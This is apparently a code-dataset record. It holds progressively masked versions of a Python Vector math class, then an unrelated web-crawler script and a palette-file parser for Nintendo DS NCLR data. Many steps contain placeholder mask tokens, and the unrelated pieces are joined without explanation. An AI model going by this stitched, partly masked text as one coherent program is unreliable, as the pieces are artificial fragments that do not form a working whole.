TypeError('The coordinates must be an iterable')\n\n def __str__(self):\n return 'Vector: {}'.format(self.coordinates)\n\n def __eq__(self, v):\n return self.coordinates == v.coordinates\n\n def iszero(self, tolerance=1e-10):\n return self.magnitude() < tolerance\n\n def plus(self, v):\n if isinstance(v, Vector):\n if self.dimension == v.dimension:\n return Vector([(x + y) for x, y in zip(self.coordinates, v.\n coordinates)])\n else:\n raise ValueError('dimension not match.')\n else:\n raise TypeError('not a Vector.')\n <mask token>\n <mask token>\n\n def magnitude(self):\n return Decimal(sqrt(sum([(x ** 2) for x in self.coordinates])))\n <mask token>\n <mask token>\n\n def angle_with(self, v, in_degree=False, tolerance=1e-10):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.dimension != v.dimension:\n raise ValueError('dimension not match.')\n d = self.dot(v) / (self.magnitude() * v.magnitude())\n if abs(abs(d) - 1) < tolerance:\n d = 1 if d > 0 else -1\n elif abs(d) < tolerance:\n d = 0\n if in_degree:\n return acos(d) / pi * 180\n else:\n return acos(d)\n\n def is_parallel_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.iszero() or v.iszero():\n return True\n v1 = self.normalize()\n v2 = v.normalize()\n return v1.minus(v2).iszero() or v1.plus(v2).iszero()\n\n def is_parallel_to2(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.iszero() or v.iszero():\n return True\n n = Vector.first_nonzero_index(self.coordinates)\n if v.coordinates[n] == 0:\n return False\n if abs(self.coordinates[n]) <= abs(v.coordinates[n]):\n return self.time_scalar(v.coordinates[n] / self.coordinates[n]\n ).minus(v).iszero()\n else:\n return v.time_scalar(self.coordinates[n] / v.coordinates[n]).minus(\n self).iszero()\n\n def is_parallel_to3(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.iszero() or v.iszero() or self.angle_with(v\n ) == 0 or self.angle_with(v) == pi\n\n def is_orthogonal_to(self, v, tolerance=1e-10):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return abs(self.dot(v)) < tolerance\n <mask token>\n\n def component_orthogonal_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.minus(self.project(v))\n\n def cross(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n r = []\n if (self.dimension != v.dimension or self.dimension == 1 or v.\n dimension == 1):\n raise ValueError('dimensions not match')\n if self.dimension == v.dimension == 2:\n z1 = z2 = Decimal(0.0)\n if self.dimension == v.dimension == 3:\n z1 = self.coordinates[2]\n z2 = v.coordinates[2]\n r.append(self.coordinates[1] * z2 - v.coordinates[1] * z1)\n r.append(v.coordinates[0] * z1 - self.coordinates[0] * z2)\n r.append(self.coordinates[0] * v.coordinates[1] - v.coordinates[0] *\n self.coordinates[1])\n return Vector(r)\n\n def parallelogram_area(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.cross(v).magnitude()\n <mask token>\n <mask token>\n <mask token>\n\n\nclass MyDecimal(Decimal):\n\n def is_near_zero(self, eps=1e-10):\n return abs(self) < eps\n", "step-3": "<mask token>\n\n\nclass Vector(object):\n <mask token>\n\n def __init__(self, coordinates):\n try:\n if not coordinates:\n raise ValueError\n self.coordinates = tuple([Decimal(x) for x in coordinates])\n self.dimension = len(coordinates)\n except ValueError:\n raise ValueError('The coordinates must be 
nonempty')\n except TypeError:\n raise TypeError('The coordinates must be an iterable')\n\n def __str__(self):\n return 'Vector: {}'.format(self.coordinates)\n\n def __eq__(self, v):\n return self.coordinates == v.coordinates\n\n def iszero(self, tolerance=1e-10):\n return self.magnitude() < tolerance\n\n def plus(self, v):\n if isinstance(v, Vector):\n if self.dimension == v.dimension:\n return Vector([(x + y) for x, y in zip(self.coordinates, v.\n coordinates)])\n else:\n raise ValueError('dimension not match.')\n else:\n raise TypeError('not a Vector.')\n <mask token>\n\n def time_scalar(self, scalar):\n try:\n return Vector([(Decimal(scalar) * x) for x in self.coordinates])\n except Exception:\n raise TypeError('{0} is not a number'.format(scalar))\n\n def magnitude(self):\n return Decimal(sqrt(sum([(x ** 2) for x in self.coordinates])))\n\n def normalize(self):\n if self.iszero():\n raise ValueError(\"Can't normalize a zero vector.\")\n else:\n return self.time_scalar(Decimal(1.0) / self.magnitude())\n\n def dot(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n elif self.dimension != v.dimension:\n raise ValueError('dimension not match.')\n else:\n return sum([(x * y) for x, y in zip(self.coordinates, v.\n coordinates)])\n\n def angle_with(self, v, in_degree=False, tolerance=1e-10):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.dimension != v.dimension:\n raise ValueError('dimension not match.')\n d = self.dot(v) / (self.magnitude() * v.magnitude())\n if abs(abs(d) - 1) < tolerance:\n d = 1 if d > 0 else -1\n elif abs(d) < tolerance:\n d = 0\n if in_degree:\n return acos(d) / pi * 180\n else:\n return acos(d)\n\n def is_parallel_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.iszero() or v.iszero():\n return True\n v1 = self.normalize()\n v2 = v.normalize()\n return v1.minus(v2).iszero() or v1.plus(v2).iszero()\n\n def is_parallel_to2(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.iszero() or v.iszero():\n return True\n n = Vector.first_nonzero_index(self.coordinates)\n if v.coordinates[n] == 0:\n return False\n if abs(self.coordinates[n]) <= abs(v.coordinates[n]):\n return self.time_scalar(v.coordinates[n] / self.coordinates[n]\n ).minus(v).iszero()\n else:\n return v.time_scalar(self.coordinates[n] / v.coordinates[n]).minus(\n self).iszero()\n\n def is_parallel_to3(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.iszero() or v.iszero() or self.angle_with(v\n ) == 0 or self.angle_with(v) == pi\n\n def is_orthogonal_to(self, v, tolerance=1e-10):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return abs(self.dot(v)) < tolerance\n\n def component_project_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return v.normalize().time_scalar(self.dot(v.normalize()))\n\n def component_orthogonal_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.minus(self.project(v))\n\n def cross(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n r = []\n if (self.dimension != v.dimension or self.dimension == 1 or v.\n dimension == 1):\n raise ValueError('dimensions not match')\n if self.dimension == v.dimension == 2:\n z1 = z2 = Decimal(0.0)\n if self.dimension == v.dimension == 3:\n z1 = self.coordinates[2]\n z2 = v.coordinates[2]\n r.append(self.coordinates[1] * z2 - v.coordinates[1] * z1)\n 
r.append(v.coordinates[0] * z1 - self.coordinates[0] * z2)\n r.append(self.coordinates[0] * v.coordinates[1] - v.coordinates[0] *\n self.coordinates[1])\n return Vector(r)\n\n def parallelogram_area(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.cross(v).magnitude()\n\n @staticmethod\n def first_nonzero_index(iterable):\n for k, item in enumerate(iterable):\n if not MyDecimal(item).is_near_zero():\n return k\n raise Exception(Vector.NO_NONZERO_ELTS_FOUND_MSG)\n\n def __getitem__(self, i):\n return self.coordinates[i]\n <mask token>\n\n\nclass MyDecimal(Decimal):\n\n def is_near_zero(self, eps=1e-10):\n return abs(self) < eps\n", "step-4": "<mask token>\ngetcontext().prec = 30\n\n\nclass Vector(object):\n NO_NONZERO_ELTS_FOUND_MSG = 'No nonzero elements found'\n\n def __init__(self, coordinates):\n try:\n if not coordinates:\n raise ValueError\n self.coordinates = tuple([Decimal(x) for x in coordinates])\n self.dimension = len(coordinates)\n except ValueError:\n raise ValueError('The coordinates must be nonempty')\n except TypeError:\n raise TypeError('The coordinates must be an iterable')\n\n def __str__(self):\n return 'Vector: {}'.format(self.coordinates)\n\n def __eq__(self, v):\n return self.coordinates == v.coordinates\n\n def iszero(self, tolerance=1e-10):\n return self.magnitude() < tolerance\n\n def plus(self, v):\n if isinstance(v, Vector):\n if self.dimension == v.dimension:\n return Vector([(x + y) for x, y in zip(self.coordinates, v.\n coordinates)])\n else:\n raise ValueError('dimension not match.')\n else:\n raise TypeError('not a Vector.')\n\n def minus(self, v):\n if isinstance(v, Vector):\n if self.dimension == v.dimension:\n return Vector([(x - y) for x, y in zip(self.coordinates, v.\n coordinates)])\n else:\n raise ValueError('dimension not match.')\n else:\n raise TypeError('not a Vector.')\n\n def time_scalar(self, scalar):\n try:\n return Vector([(Decimal(scalar) * x) for x in self.coordinates])\n except Exception:\n raise TypeError('{0} is not a number'.format(scalar))\n\n def magnitude(self):\n return Decimal(sqrt(sum([(x ** 2) for x in self.coordinates])))\n\n def normalize(self):\n if self.iszero():\n raise ValueError(\"Can't normalize a zero vector.\")\n else:\n return self.time_scalar(Decimal(1.0) / self.magnitude())\n\n def dot(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n elif self.dimension != v.dimension:\n raise ValueError('dimension not match.')\n else:\n return sum([(x * y) for x, y in zip(self.coordinates, v.\n coordinates)])\n\n def angle_with(self, v, in_degree=False, tolerance=1e-10):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.dimension != v.dimension:\n raise ValueError('dimension not match.')\n d = self.dot(v) / (self.magnitude() * v.magnitude())\n if abs(abs(d) - 1) < tolerance:\n d = 1 if d > 0 else -1\n elif abs(d) < tolerance:\n d = 0\n if in_degree:\n return acos(d) / pi * 180\n else:\n return acos(d)\n\n def is_parallel_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.iszero() or v.iszero():\n return True\n v1 = self.normalize()\n v2 = v.normalize()\n return v1.minus(v2).iszero() or v1.plus(v2).iszero()\n\n def is_parallel_to2(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.iszero() or v.iszero():\n return True\n n = Vector.first_nonzero_index(self.coordinates)\n if v.coordinates[n] == 0:\n return False\n if abs(self.coordinates[n]) <= abs(v.coordinates[n]):\n 
return self.time_scalar(v.coordinates[n] / self.coordinates[n]\n ).minus(v).iszero()\n else:\n return v.time_scalar(self.coordinates[n] / v.coordinates[n]).minus(\n self).iszero()\n\n def is_parallel_to3(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.iszero() or v.iszero() or self.angle_with(v\n ) == 0 or self.angle_with(v) == pi\n\n def is_orthogonal_to(self, v, tolerance=1e-10):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return abs(self.dot(v)) < tolerance\n\n def component_project_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return v.normalize().time_scalar(self.dot(v.normalize()))\n\n def component_orthogonal_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.minus(self.project(v))\n\n def cross(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n r = []\n if (self.dimension != v.dimension or self.dimension == 1 or v.\n dimension == 1):\n raise ValueError('dimensions not match')\n if self.dimension == v.dimension == 2:\n z1 = z2 = Decimal(0.0)\n if self.dimension == v.dimension == 3:\n z1 = self.coordinates[2]\n z2 = v.coordinates[2]\n r.append(self.coordinates[1] * z2 - v.coordinates[1] * z1)\n r.append(v.coordinates[0] * z1 - self.coordinates[0] * z2)\n r.append(self.coordinates[0] * v.coordinates[1] - v.coordinates[0] *\n self.coordinates[1])\n return Vector(r)\n\n def parallelogram_area(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.cross(v).magnitude()\n\n @staticmethod\n def first_nonzero_index(iterable):\n for k, item in enumerate(iterable):\n if not MyDecimal(item).is_near_zero():\n return k\n raise Exception(Vector.NO_NONZERO_ELTS_FOUND_MSG)\n\n def __getitem__(self, i):\n return self.coordinates[i]\n\n def __setitem__(self, i, x):\n self.coordinates[i] = x\n\n\nclass MyDecimal(Decimal):\n\n def is_near_zero(self, eps=1e-10):\n return abs(self) < eps\n", "step-5": "# -*- coding: utf-8 -*-\n\nfrom math import acos, pi, sqrt\nfrom decimal import Decimal, getcontext\n\ngetcontext().prec = 30\n\nclass Vector(object):\n NO_NONZERO_ELTS_FOUND_MSG = 'No nonzero elements found'\n \n def __init__(self, coordinates):\n try:\n if not coordinates:\n raise ValueError\n self.coordinates = tuple([Decimal(x) for x in coordinates])\n self.dimension = len(coordinates)\n\n except ValueError:\n raise ValueError('The coordinates must be nonempty')\n\n except TypeError:\n raise TypeError('The coordinates must be an iterable')\n\n def __str__(self):\n return 'Vector: {}'.format(self.coordinates)\n\n def __eq__(self, v):\n return self.coordinates == v.coordinates\n \n def iszero(self, tolerance=1e-10):\n return self.magnitude()<tolerance\n \n def plus(self, v):\n if isinstance(v, Vector):\n if self.dimension == v.dimension :\n return Vector([x+y for x, y in zip(self.coordinates, v.coordinates)])\n else:\n raise ValueError('dimension not match.')\n else:\n raise TypeError('not a Vector.')\n\n def minus(self, v):\n if isinstance(v, Vector):\n if self.dimension == v.dimension :\n return Vector([x-y for x, y in zip(self.coordinates, v.coordinates)])\n else:\n raise ValueError('dimension not match.')\n else:\n raise TypeError('not a Vector.')\n\n def time_scalar(self, scalar):\n try:\n return Vector([Decimal(scalar) * x for x in self.coordinates])\n except Exception:\n raise TypeError('{0} is not a number'.format(scalar))\n \n def magnitude(self):\n return Decimal(sqrt(sum([x**2 for x in 
self.coordinates])))\n \n def normalize(self):\n if self.iszero():\n raise ValueError(\"Can't normalize a zero vector.\")\n else:\n return self.time_scalar(Decimal(1.0)/self.magnitude())\n \n def dot(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n else:\n if self.dimension != v.dimension:\n raise ValueError('dimension not match.')\n else:\n return sum([x*y for x,y in zip(self.coordinates,v.coordinates)]) \n \n def angle_with(self, v, in_degree=False, tolerance=1e-10):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.dimension != v.dimension:\n raise ValueError('dimension not match.')\n d = self.dot(v)/(self.magnitude()*v.magnitude())\n if abs(abs(d)-1) < tolerance:\n d = 1 if d>0 else -1\n elif abs(d)<tolerance:\n d = 0\n if in_degree:\n return acos(d)/pi*180\n else:\n return acos(d)\n \n def is_parallel_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.iszero() or v.iszero():\n return True\n v1 = self.normalize()\n v2 = v.normalize()\n return (v1.minus(v2).iszero() or \n v1.plus(v2).iszero())\n \n def is_parallel_to2(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n if self.iszero() or v.iszero():\n return True\n n = Vector.first_nonzero_index(self.coordinates)\n if (v.coordinates[n] == 0):\n return False\n if abs(self.coordinates[n])<=abs(v.coordinates[n]):\n return self.time_scalar(v.coordinates[n] / self.coordinates[n]).minus(v).iszero()\n else:\n return v.time_scalar(self.coordinates[n] / v.coordinates[n]).minus(self).iszero()\n \n def is_parallel_to3(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return (self.iszero() or \n v.iszero() or\n self.angle_with(v) == 0 or\n self.angle_with(v) == pi)\n \n def is_orthogonal_to(self, v, tolerance=1e-10):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return abs(self.dot(v)) < tolerance\n\n def component_project_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return v.normalize().time_scalar(self.dot(v.normalize()))\n\n def component_orthogonal_to(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.minus(self.project(v))\n \n def cross(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n r = []\n if ((self.dimension != v.dimension) or\n (self.dimension == 1) or\n (v.dimension == 1)):\n raise ValueError('dimensions not match')\n if (self.dimension == v.dimension == 2):\n z1 = z2 = Decimal(0.0)\n if (self.dimension == v.dimension == 3):\n z1 = self.coordinates[2]\n z2 = v.coordinates[2]\n r.append(self.coordinates[1]*z2 - v.coordinates[1]*z1)\n r.append(v.coordinates[0]*z1 - self.coordinates[0]*z2)\n r.append(self.coordinates[0]*v.coordinates[1] - v.coordinates[0]*self.coordinates[1])\n return Vector(r)\n \n \n def parallelogram_area(self, v):\n if not isinstance(v, Vector):\n raise TypeError('not a Vector')\n return self.cross(v).magnitude()\n \n @staticmethod\n def first_nonzero_index(iterable):\n for k, item in enumerate(iterable):\n if not MyDecimal(item).is_near_zero():\n return k\n raise Exception(Vector.NO_NONZERO_ELTS_FOUND_MSG)\n \n def __getitem__(self, i):\n return self.coordinates[i]\n \n def __setitem__(self, i, x):\n self.coordinates[i] = x\n\n \nclass MyDecimal(Decimal):\n def is_near_zero(self, eps=1e-10):\n return abs(self) < eps", "step-ids": [ 15, 17, 23, 27, 29 ] }
[ 15, 17, 23, 27, 29 ]
import requests
from urllib.parse import urlparse
from bs4 import BeautifulSoup
import re
import datetime
import random

pages = set()


# Retrieve a list of all Internal links foound on a page.
def getInternalLinks(bs, includeUrl):
    includeUrl = f'{urlparse(includeUrl).scheme}://{urlparse(includeUrl).netloc}'
    internalLinks = []
    # Finds all links thhat begin with a "/"
    for link in bs.find_all('a', href=re.compile('^(/|.*'+includeUrl+')')):
        if link.attrs['href'] is not None:
            if link.attrs['href'] not in internalLinks:
                if link.attrs['href'].startswith('/'):
                    internalLinks.append(includeUrl+link.attrs['href'])
                else:
                    internalLinks.append(link.attrs['href'])
    return internalLinks


# Retrieves a list of all external links found on a pagee.
def getExternalLinks(bs, excludeUrl):
    externalLinks = []
    # Finds all links that starts with "http" that do
    # not contain the current URL
    for link in bs.find_all('a', href=re.compile('^(http|www)((?!'+excludeUrl+').)*$')):
        if link.attrs['href'] is not None:
            if link.attrs['href'] not in externalLinks:
                externalLinks.append(link.attrs['href'])
    return externalLinks


def getRandomExternalLink(startingPage):
    html = requests.get(startingPage)
    bs = BeautifulSoup(html.text, 'html.parser')
    externalLinks = getExternalLinks(bs, urlparse(startingPage).netloc)
    if len(externalLinks) == 0:
        print('No external links, looking around the site for one.')
        domain = f'{urlparse(startingPage).scheme}://{urlparse(startingPage).netloc}'
        internalLinks = getInternalLinks(bs, domain)
        return getRandomExternalLink(internalLinks[random.randint(0, len(internalLinks)-1)])
    else:
        return externalLinks[random.randint(0, len(externalLinks)-1)]


# Collects a list of all external URLs found on the site
allExtLinks = set()
allIntLinks = set()


def getAllExternalLinks(siteUrl):
    html = requests.get(siteUrl)
    domain = f"{urlparse(siteUrl).scheme}://{urlparse(siteUrl).netloc}"
    bs = BeautifulSoup(html.text, 'html.parser')
    internalLinks = getInternalLinks(bs, domain)
    externalLinks = getExternalLinks(bs, domain)
    for link in externalLinks:
        if link not in allExtLinks:
            allExtLinks.add(link)
            print(link)
    for link in internalLinks:
        if link not in allIntLinks:
            allIntLinks.add(link)
            getAllExternalLinks(link)


def followExternalOnly(startingSite):
    externalLink = getRandomExternalLink(startingSite)
    print(f"Random external link is: {externalLink}")
    followExternalOnly(externalLink)
normal
{ "blob_id": "5ddfeb49c16a7452c99126f1a837f3c0bed0ec10", "index": 300, "step-1": "<mask token>\n\n\ndef getExternalLinks(bs, excludeUrl):\n externalLinks = []\n for link in bs.find_all('a', href=re.compile('^(http|www)((?!' +\n excludeUrl + ').)*$')):\n if link.attrs['href'] is not None:\n if link.attrs['href'] not in externalLinks:\n externalLinks.append(link.attrs['href'])\n return externalLinks\n\n\n<mask token>\n\n\ndef followExternalOnly(startingSite):\n externalLink = getRandomExternalLink(startingSite)\n print(f'Random external link is: {externalLink}')\n followExternalOnly(externalLink)\n", "step-2": "<mask token>\n\n\ndef getExternalLinks(bs, excludeUrl):\n externalLinks = []\n for link in bs.find_all('a', href=re.compile('^(http|www)((?!' +\n excludeUrl + ').)*$')):\n if link.attrs['href'] is not None:\n if link.attrs['href'] not in externalLinks:\n externalLinks.append(link.attrs['href'])\n return externalLinks\n\n\n<mask token>\n\n\ndef getAllExternalLinks(siteUrl):\n html = requests.get(siteUrl)\n domain = f'{urlparse(siteUrl).scheme}://{urlparse(siteUrl).netloc}'\n bs = BeautifulSoup(html.text, 'html.parser')\n internalLinks = getInternalLinks(bs, domain)\n externalLinks = getExternalLinks(bs, domain)\n for link in externalLinks:\n if link not in allExtLinks:\n allExtLinks.add(link)\n print(link)\n for link in internalLinks:\n if link not in allIntLinks:\n allIntLinks.add(link)\n getAllExternalLinks(link)\n\n\ndef followExternalOnly(startingSite):\n externalLink = getRandomExternalLink(startingSite)\n print(f'Random external link is: {externalLink}')\n followExternalOnly(externalLink)\n", "step-3": "<mask token>\n\n\ndef getInternalLinks(bs, includeUrl):\n includeUrl = (\n f'{urlparse(includeUrl).scheme}://{urlparse(includeUrl).netloc}')\n internalLinks = []\n for link in bs.find_all('a', href=re.compile('^(/|.*' + includeUrl + ')')):\n if link.attrs['href'] is not None:\n if link.attrs['href'] not in internalLinks:\n if link.attrs['href'].startswith('/'):\n internalLinks.append(includeUrl + link.attrs['href'])\n else:\n internalLinks.append(link.attrs['href'])\n return internalLinks\n\n\ndef getExternalLinks(bs, excludeUrl):\n externalLinks = []\n for link in bs.find_all('a', href=re.compile('^(http|www)((?!' 
+\n excludeUrl + ').)*$')):\n if link.attrs['href'] is not None:\n if link.attrs['href'] not in externalLinks:\n externalLinks.append(link.attrs['href'])\n return externalLinks\n\n\n<mask token>\n\n\ndef getAllExternalLinks(siteUrl):\n html = requests.get(siteUrl)\n domain = f'{urlparse(siteUrl).scheme}://{urlparse(siteUrl).netloc}'\n bs = BeautifulSoup(html.text, 'html.parser')\n internalLinks = getInternalLinks(bs, domain)\n externalLinks = getExternalLinks(bs, domain)\n for link in externalLinks:\n if link not in allExtLinks:\n allExtLinks.add(link)\n print(link)\n for link in internalLinks:\n if link not in allIntLinks:\n allIntLinks.add(link)\n getAllExternalLinks(link)\n\n\ndef followExternalOnly(startingSite):\n externalLink = getRandomExternalLink(startingSite)\n print(f'Random external link is: {externalLink}')\n followExternalOnly(externalLink)\n", "step-4": "<mask token>\n\n\ndef getInternalLinks(bs, includeUrl):\n includeUrl = (\n f'{urlparse(includeUrl).scheme}://{urlparse(includeUrl).netloc}')\n internalLinks = []\n for link in bs.find_all('a', href=re.compile('^(/|.*' + includeUrl + ')')):\n if link.attrs['href'] is not None:\n if link.attrs['href'] not in internalLinks:\n if link.attrs['href'].startswith('/'):\n internalLinks.append(includeUrl + link.attrs['href'])\n else:\n internalLinks.append(link.attrs['href'])\n return internalLinks\n\n\ndef getExternalLinks(bs, excludeUrl):\n externalLinks = []\n for link in bs.find_all('a', href=re.compile('^(http|www)((?!' +\n excludeUrl + ').)*$')):\n if link.attrs['href'] is not None:\n if link.attrs['href'] not in externalLinks:\n externalLinks.append(link.attrs['href'])\n return externalLinks\n\n\ndef getRandomExternalLink(startingPage):\n html = requests.get(startingPage)\n bs = BeautifulSoup(html.text, 'html.parser')\n externalLinks = getExternalLinks(bs, urlparse(startingPage).netloc)\n if len(externalLinks) == 0:\n print('No external links, looking around the site for one.')\n domain = (\n f'{urlparse(startingPage).scheme}://{urlparse(startingPage).netloc}'\n )\n internalLinks = getInternalLinks(bs, domain)\n return getRandomExternalLink(internalLinks[random.randint(0, len(\n internalLinks) - 1)])\n else:\n return externalLinks[random.randint(0, len(externalLinks) - 1)]\n\n\n<mask token>\n\n\ndef getAllExternalLinks(siteUrl):\n html = requests.get(siteUrl)\n domain = f'{urlparse(siteUrl).scheme}://{urlparse(siteUrl).netloc}'\n bs = BeautifulSoup(html.text, 'html.parser')\n internalLinks = getInternalLinks(bs, domain)\n externalLinks = getExternalLinks(bs, domain)\n for link in externalLinks:\n if link not in allExtLinks:\n allExtLinks.add(link)\n print(link)\n for link in internalLinks:\n if link not in allIntLinks:\n allIntLinks.add(link)\n getAllExternalLinks(link)\n\n\ndef followExternalOnly(startingSite):\n externalLink = getRandomExternalLink(startingSite)\n print(f'Random external link is: {externalLink}')\n followExternalOnly(externalLink)\n", "step-5": "import requests\nfrom urllib.parse import urlparse\nfrom bs4 import BeautifulSoup\nimport re\nimport datetime\nimport random\n\npages = set()\n\n# Retrieve a list of all Internal links foound on a page.\ndef getInternalLinks(bs, includeUrl):\n includeUrl = f'{urlparse(includeUrl).scheme}://{urlparse(includeUrl).netloc}'\n internalLinks = []\n # Finds all links thhat begin with a \"/\"\n for link in bs.find_all('a',\n href=re.compile('^(/|.*'+includeUrl+')')):\n if link.attrs['href'] is not None:\n if link.attrs['href'] not in internalLinks:\n if 
link.attrs['href'].startswith('/'):\n internalLinks.append(includeUrl+link.attrs['href'])\n else:\n internalLinks.append(link.attrs['href'])\n return internalLinks\n\n# Retrieves a list of all external links found on a pagee.\ndef getExternalLinks(bs, excludeUrl):\n externalLinks = []\n # Finds all links that starts with \"http\" that do\n # not contain the current URL\n for link in bs.find_all('a',\n href=re.compile('^(http|www)((?!'+excludeUrl+').)*$')):\n if link.attrs['href'] is not None:\n if link.attrs['href'] not in externalLinks:\n externalLinks.append(link.attrs['href'])\n return externalLinks\n\ndef getRandomExternalLink(startingPage):\n html = requests.get(startingPage)\n bs = BeautifulSoup(html.text, 'html.parser')\n externalLinks = getExternalLinks(bs, \n urlparse(startingPage).netloc)\n if len(externalLinks) == 0:\n print('No external links, looking around the site for one.')\n domain = f'{urlparse(startingPage).scheme}://{urlparse(startingPage).netloc}'\n internalLinks = getInternalLinks(bs, domain)\n return getRandomExternalLink(internalLinks[random.randint(0, len(internalLinks)-1)])\n else:\n return externalLinks[random.randint(0, len(externalLinks)-1)]\n\n# Collects a list of all external URLs found on the site\nallExtLinks = set()\nallIntLinks = set()\n\ndef getAllExternalLinks(siteUrl):\n html = requests.get(siteUrl)\n domain = f\"{urlparse(siteUrl).scheme}://{urlparse(siteUrl).netloc}\"\n bs = BeautifulSoup(html.text, 'html.parser')\n internalLinks = getInternalLinks(bs, domain)\n externalLinks = getExternalLinks(bs, domain)\n for link in externalLinks:\n if link not in allExtLinks:\n allExtLinks.add(link)\n print(link)\n for link in internalLinks:\n if link not in allIntLinks:\n allIntLinks.add(link)\n getAllExternalLinks(link)\n\n\ndef followExternalOnly(startingSite):\n externalLink = getRandomExternalLink(startingSite)\n print(f\"Random external link is: {externalLink}\")\n followExternalOnly(externalLink)\n\n\n", "step-ids": [ 2, 3, 4, 5, 8 ] }
[ 2, 3, 4, 5, 8 ]
import array

from PIL import Image

from generic.editable import XEditable as Editable


class PLTT(Editable):
    """Palette information"""
    FORMAT_16BIT = 3
    FORMAT_256BIT = 4

    def define(self, clr):
        self.clr = clr
        self.string('magic', length=4, default='PLTT')  # not reversed
        self.uint32('size_')
        self.uint32('format')
        self.uint32('extended')
        self.uint32('datasize')
        self.uint32('offset')
        self.data = ''

    def load(self, reader):
        Editable.load(self, reader)
        self.data = array.array('H', reader.read(self.datasize))

    def save(self, writer):
        writer = Editable.save(self, writer)
        ofs = writer.tell()
        writer.write(self.data.tostring())
        writer.writePadding(ofs+self.datasize)
        return writer

    def get_palettes(self):
        palettes = []
        if self.format == self.FORMAT_16BIT:
            num = 16
        elif self.format == self.FORMAT_256BIT:
            num = 256
        start = 0
        for pal_id in range(len(self.data)/num):
            palette = []
            for i in range(num):
                val = self.data[start+i]
                palette.append((((val >> 0) & 0x1f) << 3,
                                ((val >> 5) & 0x1f) << 3,
                                ((val >> 10) & 0x1f) << 3,
                                255))
            start += num
            palettes.append(palette)
        return palettes

    def get_palette(self, pal_id, transparent=True):
        palette = []
        if self.format == self.FORMAT_16BIT:
            num = 16
        elif self.format == self.FORMAT_256BIT:
            num = 256
        start = pal_id*num
        for i in range(num):
            if not num and transparent:
                palette.append(chr(0)*4)
                continue
            val = self.data[start+i]
            palette.append(chr(((val >> 0) & 0x1f) << 3) +
                           chr(((val >> 5) & 0x1f) << 3) +
                           chr(((val >> 10) & 0x1f) << 3) +
                           chr(255))
        return palette

    def set_palette(self, pal_id, palette):
        """

        Parameters
        ----------
        pal_id : int
        palette : list of tuple
            List of 4-/3-int-tuple colors
        """
        if self.format == self.FORMAT_16BIT:
            num = 16
        elif self.format == self.FORMAT_256BIT:
            num = 256
        start = pal_id*num
        for i, color in enumerate(palette):
            if i > num:
                break
            r, g, b = color[:3]
            self.data[start+i] = ((r >> 3) |
                                  (g >> 3 << 5) |
                                  (b >> 3 << 10))


class NCLR(Editable):
    """2d color information
    """
    def define(self):
        self.string('magic', length=4, default='RLCN')
        self.uint16('endian', default=0xFFFE)
        self.uint16('version', default=0x101)
        self.uint32('size_')
        self.uint16('headersize', default=0x10)
        self.uint16('numblocks', default=1)
        self.pltt = PLTT(self)

    def load(self, reader):
        Editable.load(self, reader)
        assert self.magic == 'RLCN', 'Expected RLCN got '.format(self.magic)
        self.pltt.load(reader)

    def save(self, writer=None):
        writer = Editable.save(self, writer)
        writer = self.pltt.save(writer)
        return writer

    def get_palette(self, pal_id=0, transparent=True):
        return self.pltt.get_palette(pal_id, transparent)

    def get_palettes(self):
        return self.pltt.get_palettes()

    def set_palette(self, pal_id, palette):
        return self.pltt.set_palette(pal_id, palette)
normal
